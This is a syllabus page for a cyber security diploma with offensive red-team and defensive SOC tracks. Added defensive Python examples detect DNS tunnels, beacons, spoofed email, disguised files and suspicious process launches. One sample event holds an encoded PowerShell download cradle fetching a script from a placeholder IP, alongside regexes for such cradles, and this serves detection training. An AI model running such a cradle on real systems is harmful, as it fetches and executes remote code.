
Cyber Security Diploma

  • COURSES: 5 Months

  • DURATION: 120 Hours

  • FEE: From 12,000 EGP

About Course

Offensive and Defensive Diploma

Offensive Track
• Duration: 60 Hours (15 Sessions)
• Session Duration: 4 hours

The aim of this track is to show you how to emulate a potential adversary's attack in complex environments. Going beyond penetration testing, you will learn to conduct successful Red Team engagements and challenge the defensive capability of your clients.
After completing this track, you will have the advanced skills needed to pursue new career opportunities in offensive security.

Module 0:

● Linux Fundamentals
● Network Fundamentals
● Welcome to the Offensive Field


Module 1: Introduction to Red Teaming

● Red Team Fundamentals
● Red Team Engagements
● Red Team Threat Intel
● Red Team OPSEC
● Intro to C2



Module 2: Reconnaissance and Footprinting

● Passive and active reconnaissance techniques
● Open-source intelligence (OSINT) gathering
● Target enumeration and identification
● Footprinting techniques and tools
● Advanced footprinting techniques


Module 3: Scanning and Enumeration

● Port scanning and service enumeration
● Tips for Awesome Scanning
● Version Scanning with Nmap
● False-Positive Reduction
● Netcat for the Pen Tester
● Getting the Most Out of Nmap
● Faster Scanning with Masscan
● OS Fingerprinting, Version Scanning In-Depth, Netcat for Penetration Testers, and EyeWitness
● Nmap In-Depth: The Nmap Scripting Engine
● Advanced scanning and enumeration techniques
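An added example for this module, not part of the course materials: false-positive reduction in practice means working from the XML that `nmap -sV -oX` writes, because Nmap records its own 1..10 confidence (`conf`) in every service guess. The sample XML below is constructed to match that shape (the 10.0.0.0/30 hosts, products and versions are invented), and the `min_conf` cut-off is an assumed house rule for the engagement, not an Nmap option.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape Nmap writes with `nmap -sV -oX`; not a real scan.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 10.0.0.0/30">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="10.0.0.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1" conf="10"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="nginx" version="1.18.0" conf="10"/></port>
      <port protocol="tcp" portid="443"><state state="filtered"/>
        <service name="https" conf="3"/></port>
    </ports>
  </host>
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="10.0.0.2" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="8080"><state state="open"/>
        <service name="http-proxy" conf="3"/></port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="10.0.0.3" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_open_services(xml_text, min_conf=5):
    """Return (ip, port, service, product, version) tuples for open ports only.

    Nmap's <service conf="N"> is its confidence (1..10) in the guess; guesses below
    min_conf are reported as 'unknown' so a weak guess does not become a finding
    that later has to be walked back.  Filtered and closed ports are dropped.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.findall("host"):
        if host.find("status").get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        ports_el = host.find("ports")
        if addr_el is None or ports_el is None:
            continue
        for port in ports_el.findall("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            conf = int(svc.get("conf", "0")) if svc is not None else 0
            if svc is None or conf < min_conf:
                name, product, version = "unknown", "", ""
            else:
                name = svc.get("name", "unknown")
                product = svc.get("product", "")
                version = svc.get("version", "")
            findings.append((addr_el.get("addr"), int(port.get("portid")),
                             name, product, version))
    return findings


def summarize(findings):
    """One line per open port, the form that goes into the engagement notes."""
    return [("%s:%d %s %s %s" % f).strip() for f in findings]


if __name__ == "__main__":
    for line in summarize(parse_open_services(SAMPLE_NMAP_XML)):
        print(line)
```

Lowering `min_conf` to 1 turns the 8080 guess back into `http-proxy`; the point is that the threshold is a deliberate choice recorded with the results, not something left to the scanner.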

Module 4: Exploitation and Post-Exploitation
● Gaining Initial Access
● Password Guessing, Spraying, and Credential Stuffing
● Exploitation and Exploit Categories
● Exploiting Network Services and Leveraging Meterpreter
● Command and Control Frameworks and Selecting the One for You
● Using the Adversary Emulation and Red Team Framework
● Post-Exploitation with PowerShell Empire
● Payload Generation in Metasploit and Sliver
● Post-Exploitation
● Assumed Breach Testing
● Situational Awareness on Linux and Windows
● Extracting Useful Information from a Compromised Windows Host



Module 5: Privilege Escalation, Persistence, and Password Attacks

● Privilege Escalation Methods and Techniques on Windows and Linux
● Persistence and Maintaining Access
● Password Attack Tips
● Retrieving and Manipulating Hashes from Windows, Linux, and Other Systems
● Extracting Hashes and Passwords from Memory with Mimikatz and the Meterpreter Kiwi extension
● Effective Password Cracking with John the Ripper and Hashcat



Module 6: Compromising Active Directory

● Active Directory Basics
● Breaching Active Directory
● Enumerating Active Directory
● Lateral Movement and Pivoting
● Exploiting Active Directory
● Persisting Active Directory
● Credentials Harvesting


Module 7: Network Security Evasion

● Network Security Solutions and Evasion
● Firewalls Evasion
● Sandbox Evasion



Module 8: Use cases
● Real Scenarios and use cases
● Red Team Capture-the-Flag


Defensive Track

• Duration: 60 Hours (15 Sessions)
• Session Duration: 4 hours

In the Junior Security Analyst role, students act as triage specialists. They spend a significant portion of their time triaging or monitoring event logs and alerts.

The responsibilities of a Junior Security Analyst or Tier 1 SOC Analyst include the following:
● Monitor and investigate alerts (most of the time, it's a 24x7 SOC operations environment)
● Configure and manage security tools
● Develop and implement IDS signatures
● Escalate the security incidents to the Tier 2 and Team Lead if needed

1. Blue Team Tools and Operations
a. Introduction to the Blue Team Mission
i. What is a SOC? What is the mission?
ii. Why are we being attacked?
iii. Modern defense mindset
iv. The challenges of SOC work
b. SOC Overview
i. The people, process, and technology of a SOC
ii. Aligning the SOC with your organization
iii. SOC functional component overview
iv. Tiered vs. tierless SOCs
v. Important operational documents
c. Defensible Network Concepts
i. Understanding what it takes to be defensible
ii. Network security monitoring (NSM) concepts
iii. NSM event collection
iv. NSM by network layer
v. Continuous security monitoring (CSM) concepts
vi. CSM event collection
vii. Monitoring sources overview
viii. Data centralization
d. Events, Alerts, Anomalies, and Incidents
i. Event collection
ii. Event log flow
iii. Alert collection
iv. Alert triage and log flow
v. Signatures vs. anomalies
vi. Alert triage workflow and incident creation
e. Incident Management Systems
i. SOC data organization tools
ii. Incident management systems options and features
iii. Data flow in incident management systems
iv. Case creation, alerts, observables, playbooks, and workflow
v. Case and alert naming convention
vi. Incident categorization framework
f. Threat Intelligence Platforms
i. What is cyber threat intelligence?
ii. Threat data vs. information vs. intelligence
iii. Threat intel platform options, features, and workflow
iv. Event creation, attributes, correlation, and sharing
g. SIEM
i. Benefits of data centralization
ii. SIEM options and features
iii. SIEM searching, visualizations, and dashboards
iv. Use cases and use case databases
h. Automation and Orchestration
i. How SOAR works and benefits the SOC
ii. Options and features
iii. SOAR value-adds and API interaction
iv. Data flow between SOAR and the SIEM, incident management system, and threat intelligence platform
i. Who Are Your Enemies?
i. Who's attacking us and what do they want?
ii. Opportunistic vs. targeted attackers
iii. Hacktivists, insiders, organized crime, governments
iv. Motivation by attacker group
v. Case studies of different attack groups
vi. Attacker group naming conventions
2. Understanding Your Network
a. Corporate Network Architecture
i. Routers and security
ii. Zones and traffic flow
iii. Switches and security
iv. VLANs
v. Home firewall vs. corporate next-gen firewall capabilities
vi. The logical vs. physical network
vii. Points of visibility
viii. Traffic capture
ix. Network architecture design ideals
x. Zero-trust architecture and least-privilege ideals
b. Traffic Capture and Analysis
i. Network traffic capture formats
ii. NetFlow
iii. Layer 7 metadata collection
iv. PCAP collection
v. Wireshark and Moloch (now Arkime)
c. Understanding DNS
i. Name to IP mapping structure
ii. DNS server and client types (stub resolvers, forwarding, caching, and authoritative servers)
iii. Walkthrough of a recursive DNS resolution
iv. Request types
v. Setting records via registrars and on your own server
vi. A and AAAA records
vii. PTR records and when they might fail
viii. TXT records and their uses
ix. CNAME records and their uses
x. MX records for mail
xi. SRV records
xii. NS records and glue records
d. DNS analysis and attacks
i. Detecting requests for malicious sites
ii. Checking domain reputation, age, randomness, length, subdomains
iii. Whois
iv. Reverse DNS lookups and passive DNS
v. Shared hosting
vi. Detecting DNS recon
vii. Unauthorized DNS server use
viii. Domain shadowing
ix. DNS tunneling
x. DNS traffic flow and analysis
xi. IDNs, punycode, and look-alike domains
xii. New DNS standards (DNS over TLS, DNS over HTTPS, DNSSEC)
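An added example, not from the course, for the DNS tunneling and "randomness, length, subdomains" items above: a first-pass tunnel detector over a constructed query log. It scores the part of each name left of the registered domain for length and Shannon entropy, then flags a client/domain pair when several such queries ride on TXT or NULL records, the types tunnels use to carry data back down. The `badtunnel.net` domain, client addresses, log format and thresholds are all invented for the example, and the two-label registered-domain split is a stated simplification.

```python
import math
from collections import Counter, defaultdict

# Constructed query log (time, client, qtype, qname); the tunnel names are invented
# to look like hex/base64 chunks under a throwaway domain, not real traffic.
SAMPLE_DNS_LOG = """\
10:00:01 10.1.1.5 A    www.example.com
10:00:02 10.1.1.5 AAAA mail.example.com
10:00:03 10.1.1.9 TXT  4a6f686e20446f65.3a2f2f.aGVsbG8gd29ybGQ.c2.badtunnel.net
10:00:04 10.1.1.9 TXT  5061737377307264.3a2f2f.cGFzc3dvcmQ.c3.badtunnel.net
10:00:05 10.1.1.9 TXT  7365637265742d6b.3a2f2f.a2V5ZGF0YQ.c4.badtunnel.net
10:00:06 10.1.1.5 A    cdn.example.com
"""


def shannon_entropy(text):
    """Bits per character; encoded payloads sit near 4+, real hostnames usually below 3."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def registered_domain(qname):
    """'Last two labels' approximation.  ASSUMPTION: no multi-label public suffixes
    (co.uk and friends) in the data; production code should use the Public Suffix List."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def query_features(qname):
    """Length and entropy of everything left of the registered domain."""
    labels = qname.rstrip(".").split(".")
    sub = "".join(labels[:-2])
    return {"labels": len(labels) - 2, "sub_len": len(sub), "entropy": shannon_entropy(sub)}


def find_tunnel_candidates(log_text, min_queries=3, min_entropy=3.5, min_len=30):
    """Group queries per (client, registered domain) and flag a group when at least
    min_queries of its names carry long, high-entropy subdomain data and at least
    half of the group's queries use TXT/NULL records."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        _, client, qtype, qname = line.split()
        groups[(client, registered_domain(qname))].append((qtype, query_features(qname)))
    flagged = []
    for (client, domain), items in groups.items():
        encoded = [f for _, f in items
                   if f["entropy"] >= min_entropy and f["sub_len"] >= min_len]
        txt_share = sum(1 for t, _ in items if t in ("TXT", "NULL")) / len(items)
        if len(encoded) >= min_queries and txt_share >= 0.5:
            flagged.append({
                "client": client,
                "domain": domain,
                "queries": len(items),
                "mean_entropy": round(sum(f["entropy"] for f in encoded) / len(encoded), 2),
            })
    return flagged


if __name__ == "__main__":
    for hit in find_tunnel_candidates(SAMPLE_DNS_LOG):
        print(hit)
```

Entropy alone is not a verdict: CDN and cloud hostnames are also long and random-looking, which is why the check is tied to the record type and to per-client volume rather than to a single query, and why the registered domain (age, reputation, passive DNS history) gets looked up before anyone opens a case.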
e. Understanding HTTP and HTTPS
i. Decoding URLs
ii. HTTP communication between client and server
iii. Browser interpretation of HTTP and REST APIs
iv. GET, POST, and other methods
v. Request header analysis
vi. Response header analysis
vii. Response codes
viii. The path to the Internet
ix. REST APIs
x. WebSockets
xi. HTTP/2 & HTTP/3
f. Analyzing HTTP for Suspicious Activity
i. HTTP attack and analysis approaches
ii. Credential phishing
iii. Reputation checking
iv. Sandboxing
v. URL and domain OSINT
vi. Header and content analysis
vii. User-agent deconstruction
viii. Cookies
ix. How Base64 encoding works, and conversion
x. File extraction and analysis
xi. High frequency GET/POST activity
xii. Host headers and naked IP addresses
xiii. Exploit kits and malicious redirection
xiv. HTTPS and certificate inspection
xv. SSL decryption - what you can do with/without it
xvi. TLS 1.3
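An added example (not course material) for the "high frequency GET/POST activity" item above: beacon detection over a constructed proxy log. An implant checking in on a timer produces near-constant gaps between requests to the same host and touches only a path or two, so the script groups requests per client and destination host and measures the coefficient of variation of the inter-request gaps. The log format, hosts, addresses, user agent and thresholds are invented for the example.

```python
import shlex
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed proxy log: time, client, method, url, status, bytes, user-agent (quoted).
# 10.2.2.7 checks in about once a minute; 10.2.2.8 is a person browsing.
SAMPLE_PROXY_LOG = """\
2024-05-01T09:00:00 10.2.2.7 GET http://update.example.org/api/v1/check 200 412 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-05-01T09:01:01 10.2.2.7 POST http://update.example.org/api/v1/check 200 418 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-05-01T09:01:59 10.2.2.7 POST http://update.example.org/api/v1/check 200 410 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-05-01T09:03:00 10.2.2.7 POST http://update.example.org/api/v1/check 200 415 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-05-01T09:04:02 10.2.2.7 POST http://update.example.org/api/v1/check 200 409 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-05-01T09:00:12 10.2.2.8 GET http://www.example.com/ 200 51233 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-05-01T09:00:13 10.2.2.8 GET http://www.example.com/static/app.js 200 88012 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-05-01T09:17:40 10.2.2.8 GET http://www.example.com/news 200 44120 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
2024-05-01T09:52:03 10.2.2.8 GET http://www.example.com/about 200 30110 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""


def parse_proxy_log(text):
    """shlex keeps the quoted user agent as one field."""
    rows = []
    for line in text.splitlines():
        ts, client, method, url, status, size, ua = shlex.split(line)
        parts = urlsplit(url)
        rows.append({"ts": datetime.fromisoformat(ts), "client": client, "method": method,
                     "host": parts.hostname, "path": parts.path,
                     "status": int(status), "bytes": int(size), "ua": ua})
    return rows


def find_beacons(rows, min_hits=4, max_interval_cv=0.2, max_paths=2):
    """Flag (client, host) pairs whose request gaps are almost constant (low
    coefficient of variation) and that hit only a few distinct paths."""
    by_pair = defaultdict(list)
    for r in rows:
        by_pair[(r["client"], r["host"])].append(r)
    beacons = []
    for (client, host), hits in by_pair.items():
        if len(hits) < min_hits:
            continue
        hits.sort(key=lambda r: r["ts"])
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(hits, hits[1:])]
        avg = mean(gaps)
        interval_cv = pstdev(gaps) / avg if avg > 0 else float("inf")
        paths = {r["path"] for r in hits}
        if interval_cv <= max_interval_cv and len(paths) <= max_paths:
            beacons.append({
                "client": client, "host": host, "hits": len(hits),
                "mean_interval_s": round(avg, 1),
                "interval_cv": round(interval_cv, 3),
                "post_share": round(sum(r["method"] == "POST" for r in hits) / len(hits), 2),
            })
    return beacons


if __name__ == "__main__":
    for b in find_beacons(parse_proxy_log(SAMPLE_PROXY_LOG)):
        print(b)
```

Real implants add jitter, so `max_interval_cv` is a tuning knob rather than a constant, and legitimate software updaters also poll on timers; the follow-up is the host and user-agent review from the items above, not an automatic block.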
g. How SMTP and Email Attacks Work
i. Email delivery infrastructure
ii. SMTP Protocol
iii. Reading email headers and source
iv. Identifying spoofed email
v. Decoding attachments
vi. How email spoofing works
vii. How SPF works
viii. How DKIM works
ix. How DMARC works
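An added example, not from the course materials, tying the spoofing, SPF, DKIM and DMARC items together: a checker that reads one constructed message (domains, addresses and the Authentication-Results line are invented) and explains why an SPF pass alone does not vouch for the sender. SPF is evaluated against the envelope MAIL FROM, DKIM against the signing domain, and DMARC against the header From that the recipient actually sees, so disagreement between those is the signal to look for.

```python
import email
import re
from email.utils import parseaddr

# Constructed message (not a real capture): the header From claims corp.example while
# the envelope sender and the SPF-checked MAIL FROM belong to an unrelated domain.
SAMPLE_RAW_EMAIL = """\
Return-Path: <bounce@mail-delivery.example.net>
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=mail-delivery.example.net;
 dkim=none; dmarc=fail (p=quarantine) header.from=corp.example
From: "Jane Doe" <jane.doe@corp.example>
Reply-To: finance-urgent@webmail.example
To: bob@corp.example
Subject: Urgent wire transfer
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8

Bob, please process the attached invoice before close of business today.
"""


def domain_of(addr):
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def parse_auth_results(header_value):
    """Pull the spf/dkim/dmarc verdicts out of an Authentication-Results header.
    A method that is absent is reported as 'none'."""
    verdicts = {}
    for method in ("spf", "dkim", "dmarc"):
        m = re.search(r"\b%s=([a-z]+)" % method, header_value or "", re.I)
        verdicts[method] = m.group(1).lower() if m else "none"
    return verdicts


def analyze_email(raw):
    """Compare the three identities a message carries and list the mismatches."""
    msg = email.message_from_string(raw)
    display, from_addr = parseaddr(msg.get("From", ""))
    from_dom = domain_of(from_addr)
    _, envelope = parseaddr(msg.get("Return-Path", ""))
    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    auth = parse_auth_results(msg.get("Authentication-Results", ""))

    findings = []
    if envelope and domain_of(envelope) != from_dom:
        findings.append("envelope sender domain differs from From domain")
    if reply_to and domain_of(reply_to) != from_dom:
        findings.append("Reply-To domain differs from From domain")
    embedded = re.search(r"[\w.+-]+@([\w.-]+)", display)       # "CEO <ceo@x>" <evil@y>
    if embedded and embedded.group(1).lower() != from_dom:
        findings.append("display name embeds a different address")
    if auth["dkim"] in ("none", "fail"):
        findings.append("no valid DKIM signature")
    if auth["dmarc"] == "fail":
        findings.append("DMARC failed for the From domain (SPF pass covered only MAIL FROM)")
    return {"from_domain": from_dom, "envelope_domain": domain_of(envelope),
            "auth": auth, "findings": findings}


if __name__ == "__main__":
    for k, v in analyze_email(SAMPLE_RAW_EMAIL).items():
        print(k, v)
```

The Authentication-Results header is only trustworthy when it was written by your own receiving MTA; a sender can include a forged one, so production code checks the `authserv-id` (the `mx.corp.example` token here) before believing it.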
h. Additional Important Protocols
i. SMB - versions and typical attacks
ii. DHCP for defenders
iii. ICMP and how it is abused
iv. FTP and attacks
v. SSH and attacks
vi. PowerShell remoting
3. Understanding Endpoints, Logs, and Files
a. Endpoint Attack Tactics
i. Endpoint attack centricity
ii. Initial exploitation
iii. Service-side vs client-side exploits
iv. Post-exploitation tactics, tools, and explanations - execution, persistence, discovery, privilege escalation, credential access, lateral movement, collection, exfiltration
b. Endpoint Defense In-Depth
i. Network scanning and software inventory
ii. Vulnerability scanning and patching
iii. Anti-exploitation
iv. Whitelisting
v. Host intrusion prevention and detection systems
vi. Host firewalls
vii. File integrity monitoring
viii. Privileged access workstations
ix. Windows privileges and permissions
x. Endpoint detection and response tools (EDR)
xi. File and drive encryption
xii. Data loss prevention
xiii. User and entity behavior analytics (UEBA)
c. How Windows Logging Works
i. Channels, event IDs, and sources
ii. XML format and event templates
iii. Log collection path
iv. Channels of interest for tactical data collection
d. How Linux Logging Works
i. Syslog log format
ii. Syslog daemons
iii. Syslog network protocol
iv. Log collection path
v. Systemd journal
vi. Additional command line auditing options
vii. Application logging
viii. Service vs. system logs
e. Interpreting Important Events
i. Windows and Linux login events
ii. Process creation logs for Windows and Linux
iii. Additional activity monitoring
iv. Firewall events
v. Object and file auditing
vi. Service creation and operation logging
vii. New scheduled tasks
viii. USB events
ix. User creation and modification
x. Windows Defender events
xi. PowerShell logging
xii. Kerberos and Active Directory Events
xiii. Authentication and the ticket-granting service
xiv. Kerberos authentication steps
xv. Kerberos log events in detail
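An added example, not part of the course, for the "process creation logs" and "PowerShell logging" items: Security event 4688 in the XML form exported from the Windows event log, parsed with the standard library and scored with two checks a Tier 1 analyst applies early, an Office parent launching a script host and an encoded PowerShell command that decodes to a download cradle. The events, host name, user and URL are constructed here (the base64 blob is built in the script so it decodes cleanly), and the example assumes command-line auditing is enabled so the CommandLine field is populated.

```python
import base64
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed events in the Security channel's XML form; names, user and URL are invented.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/a.ps1')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode()   # what -enc expects


def _event(user, new_proc, parent, cmdline):
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4688</EventID>
    <Channel>Security</Channel><Computer>WS01.corp.example</Computer></System>
  <EventData>
    <Data Name="SubjectUserName">{user}</Data>
    <Data Name="NewProcessName">{new_proc}</Data>
    <Data Name="CommandLine">{cmdline}</Data>
    <Data Name="ParentProcessName">{parent}</Data>
  </EventData>
</Event>"""


SAMPLE_EVENTS = [
    _event("alice", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
           r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
           f"powershell.exe -nop -w hidden -enc {_ENC}"),
    _event("alice", r"C:\Windows\System32\notepad.exe",
           r"C:\Windows\explorer.exe", "notepad.exe notes.txt"),
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}


def parse_4688(xml_text):
    """Flatten System/EventID and every EventData/Data field into one dict."""
    root = ET.fromstring(xml_text)
    ev = {"event_id": root.findtext("e:System/e:EventID", namespaces=NS),
          "computer": root.findtext("e:System/e:Computer", namespaces=NS)}
    for d in root.find("e:EventData", NS).findall("e:Data", NS):
        ev[d.get("Name")] = d.text or ""
    return ev


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64) or None."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_process_creation(ev):
    """Reasons this 4688 deserves a look; empty list means nothing matched."""
    reasons = []
    if ev.get("event_id") != "4688":
        return reasons
    child, parent = _basename(ev["NewProcessName"]), _basename(ev["ParentProcessName"])
    cmdline = ev.get("CommandLine", "")
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"office app {parent} spawned script host {child}")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded PowerShell command: " + decoded)
        if re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", decoded, re.I):
            reasons.append("decoded command fetches remote content")
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I):
        reasons.append("hidden window requested")
    return reasons


if __name__ == "__main__":
    for xml_text in SAMPLE_EVENTS:
        ev = parse_4688(xml_text)
        print(ev["computer"], ev["SubjectUserName"], _basename(ev["NewProcessName"]),
              assess_process_creation(ev) or "ok")
```

Event 4688 only carries the command line when "Include command line in process creation events" is turned on in the audit policy; without it the encoded-command check has nothing to work with, which is why Sysmon event 1 or PowerShell script block logging (event 4104) are usually collected alongside.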
f. Log Collection, Parsing, and Normalization
i. Logging pipeline and collection methods
ii. Windows vs. Linux log agent collection options
iii. Parsing unstructured vs. structured logs
iv. SIEM-centric formats
v. Efficient searching in your SIEM
vi. The role of parsing and log enrichment
vii. Log normalization and categorization
viii. Log storage and retention lifecycle
g. File Contents and Identification
i. File contents at the byte level
ii. How to identify a file by the bytes
iii. Magic bytes
iv. Nested files
v. Strings - uses, encoding options, and viewing
h. Identifying and Handling Suspicious Files
i. Safely handling suspicious files
ii. Dangerous file types
iii. Exploits vs. program "features"
iv. Exploits vs. Payloads
v. Executables, scripts, office docs, RTFs, PDFs, and miscellaneous exploits
vi. Hashing and signature verification
vii. Signature inspection and safety of verified files
viii. Inspection methods, detecting malicious scripts and other files
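An added example serving both "File Contents and Identification" and "Identifying and Handling Suspicious Files" above (not from the course): identify a file by its leading bytes rather than its extension, open ZIP-based Office containers to see what they really hold, and pull printable strings without executing anything. The two sample files are constructed in memory (a PE stub named `.pdf`, and a Word container carrying a `vbaProject.bin`); the signature table is a short subset of what a real `file`/libmagic database knows.

```python
import io
import re
import zipfile

# (leading bytes, description); the ZIP and OLE2 entries are containers that need a second look.
MAGIC = [
    (b"MZ", "PE executable (Windows)"),
    (b"\x7fELF", "ELF executable"),
    (b"%PDF-", "PDF"),
    (b"PK\x03\x04", "ZIP container"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE2 compound file (legacy Office)"),
    (b"{\\rtf", "RTF"),
    (b"\x89PNG\r\n\x1a\n", "PNG"),
]

EXPECTED = {"pdf": {"PDF"}, "docx": {"ZIP container"}, "docm": {"ZIP container"},
            "xlsx": {"ZIP container"}, "png": {"PNG"}, "exe": {"PE executable (Windows)"}}


def identify(data):
    """Type by magic bytes; 'unknown' rather than a guess when nothing matches."""
    for sig, desc in MAGIC:
        if data.startswith(sig):
            return desc
    return "unknown"


def inspect_zip(data):
    """Entry names tell Office containers apart; a vbaProject.bin means macros."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
    kind = "ZIP archive"
    if "[Content_Types].xml" in names:
        if any(n.startswith("word/") for n in names):
            kind = "OOXML Word document"
        elif any(n.startswith("xl/") for n in names):
            kind = "OOXML Excel workbook"
        elif any(n.startswith("ppt/") for n in names):
            kind = "OOXML PowerPoint"
        else:
            kind = "OOXML (other)"
    has_macros = any(n.endswith("vbaProject.bin") for n in names)
    return kind, has_macros, sorted(names)


def ascii_strings(data, min_len=6):
    """Runs of printable ASCII, the same idea as the `strings` tool."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def assess_file(name, data):
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    detected = identify(data)
    report = {"name": name, "detected": detected, "flags": []}
    if ext in EXPECTED and detected not in EXPECTED[ext]:
        report["flags"].append(f"extension .{ext} does not match content ({detected})")
    if detected == "ZIP container":
        kind, macros, _ = inspect_zip(data)
        report["container"] = kind
        if macros:
            report["flags"].append("VBA project present (macros)")
        if macros and ext == "docx":
            report["flags"].append("macros inside a .docx (macro-enabled content should be .docm)")
    report["strings"] = ascii_strings(data)[:5]
    return report


def _build_docx_with_macros():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 16)
    return buf.getvalue()


# Constructed samples: a PE stub mislabelled as a PDF, and a Word file carrying a VBA project.
SAMPLE_FILES = {
    "invoice.pdf": b"MZ\x90\x00" + b"\x00" * 60
                   + b"This program cannot be run in DOS mode.\r\n$" + b"\x00" * 16,
    "report.docx": _build_docx_with_macros(),
}

if __name__ == "__main__":
    for fname, blob in SAMPLE_FILES.items():
        print(assess_file(fname, blob))
```

Reading the bytes is safe; what must never happen on the analyst workstation is double-clicking the sample, which is why the container is opened with `zipfile` rather than Word.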
4. Triage and Analysis
a. Alert Triage and Prioritization
i. Priority for triage
ii. Spotting late-stage attacks
iii. Attack lifecycle models
iv. Spotting exfiltration and destruction attempts
v. Attempts to access sensitive users, hosts, and data
vi. Targeted attack identification
vii. Lower-priority alerts
viii. Alert validation
b. Perception, Memory, and Investigation
i. The role of perception and memory in observation and analysis
ii. Working within the limitations of short-term memory
iii. Efficiently committing info to long-term memory
iv. Decomposition and externalization techniques
v. The effects of experience on speed and creativity
c. Mental Models for Information Security
i. Network and file encapsulation
ii. Cyber kill chain
iii. Defense-in-depth
iv. NIST cybersecurity framework
v. Incident response cycle
vi. Threat intelligence levels, models, and uses
vii. F3EAD
viii. Diamond model
ix. The OODA loop
x. Attack modeling, graph/list thinking, attack trees
xi. Pyramid of pain
xii. MITRE ATT&CK
d. Structured Analysis Techniques
i. Compensating for memory and perception issues via structured analysis
ii. System 1 vs. System 2 thinking and battling tacit knowledge
iii. Data-driven vs. concept-driven analysis
iv. Structured analytic techniques
v. Idea generation and creativity, hypothesis development
vi. Confirmation bias avoidance
vii. Analysis of competing hypotheses
viii. Diagnostic reasoning
ix. Link analysis, event matrices
e. Analysis Questions and Tactics
i. Where to start - breaking down an investigation
ii. Alert validation techniques
iii. Sources of network and host information
iv. Data extraction
v. OSINT sources
vi. Data interpretation
vii. Assessing strings, files, malware artifacts, email, links
f. Analysis OPSEC
i. OPSEC vs. your threat model
ii. Traffic light protocol and intel sharing
iii. Permissible action protocol
iv. Common OPSEC failures and how to avoid them
g. Intrusion Discovery
i. Dwell time and intrusion type
ii. Determining attacker motivation
iii. Assessing business risk
iv. Choosing an appropriate response
v. Reacting to opportunistic/targeted attacks
vi. Common missteps in incident response
h. Incident Closing and Quality Review
i. Steps for closing incidents
ii. Quality review and peer feedback
iii. Analytical completeness checks
iv. Closed case classification
v. Attribution
vi. Maintaining quality over time
vii. Premortem and challenge analysis
viii. Peer review, red team, team A/B analysis, and structured self-critique
5. Continuous Improvement, Analytics, and Automation
a. Improving Life in the SOC
i. Expectations vs. common reality
ii. Burnout and stress avoidance
iii. Improvement through SOC human capital theory
iv. The role of automation, operational efficiency, and metrics in burnout
v. Other common SOC issues
b. Analytic Features and Enrichment
i. Goals of analytic creation
ii. Log features and parsing
iii. High-feature vs. low-feature logs
iv. Improvement through SIEM enrichment
v. External tools and other enrichment sources
c. New Analytic Design, Testing, and Sharing
i. Tolerance to false positives/negatives
ii. The false positive paradox
iii. Types of analytics
iv. Feature selection for analytics
v. Matching with threat intel
